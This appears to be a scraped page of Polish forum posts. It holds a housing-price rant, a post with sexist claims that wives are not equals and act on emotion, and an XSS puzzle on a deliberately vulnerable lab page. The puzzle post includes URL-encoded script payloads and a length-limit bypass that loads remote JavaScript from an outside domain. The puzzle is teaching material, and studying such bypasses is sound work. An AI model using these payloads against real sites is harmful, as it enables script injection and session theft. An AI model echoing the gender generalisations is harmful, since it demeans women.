Aktywne Wpisy
rzzz +114
Badanie z końcówki 2023.
Ponad 80% rodaków nie ma nawet 50 tys. złotych. Najprawdopodobniej znakomita większość z nich nigdy nie widziała takich pieniędzy na koncie.
Nie przeszkadza im to brać hipotek na 700k na dwa pokoje. Bo to fair price jest.
Jakby mick napisał, to nie jest śmieszne...
#nieruchomosci
Ponad 80% rodaków nie ma nawet 50 tys. złotych. Najprawdopodobniej znakomita większość z nich nigdy nie widziała takich pieniędzy na koncie.
Nie przeszkadza im to brać hipotek na 700k na dwa pokoje. Bo to fair price jest.
Jakby mick napisał, to nie jest śmieszne...
#nieruchomosci
Zdradze wam przepis na spokojne i szczesliwe zycie w zwiazku - zone trzeba traktowac jak zone.
Nie wolno podchodzic do niej jak do rownego sobie, kobiety nie rozumieja wielu rzeczy, czesto kieruja sie emocjami a nie logika. Oczywiscie dziala to tez w druga strone, gdzie jest lepsza ode mnie w wielu aspektach ale dzisiaj nie o tym.
Mam 28lv, zona 26lv jestesmy malzenstwem od 3 lat, w zwiazku od 4. Od samego
Nie wolno podchodzic do niej jak do rownego sobie, kobiety nie rozumieja wielu rzeczy, czesto kieruja sie emocjami a nie logika. Oczywiscie dziala to tez w druga strone, gdzie jest lepsza ode mnie w wielu aspektach ale dzisiaj nie o tym.
Mam 28lv, zona 26lv jestesmy malzenstwem od 3 lat, w zwiazku od 4. Od samego
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
imie
jest ograniczone do 30 znaków. A zatem najprostszy
alert(1)
da radę wykonać, ale odrobinę bardziej skomplikowany
alert(document.domain)
już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
A zatem pytanie brzmi: co należy tutaj zrobić, aby móc pomimo wszystko wykonać tutaj dowolny kod javascriptowy, zapominając o 30-znakowym ograniczeniu? Miło widziany proof of concept :)
src
tagu
script
, to nazwa domeny musiałaby składać się z co najwyżej trzech znaków. Wykonalne, choć wymaga trochę zachodu. Jest inny sposób, który nie wymaga takich nakładów.
Jak nie będzie odpowiedzi do jutrzejszego wieczoru, to podam rozwiązanie.
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
178.63.136.164 kzlk.pl
Nie jestem pewien czy inny doctype przypadkiem nie zablokowały takiego zamknięcia script, muszę to pózniej sprawdzić.
Jak będę wieczorem na kompie, to podam jeszcze inne rozwiazanie.
Teraz doczytałem, że faktycznie
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
postMessage
, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim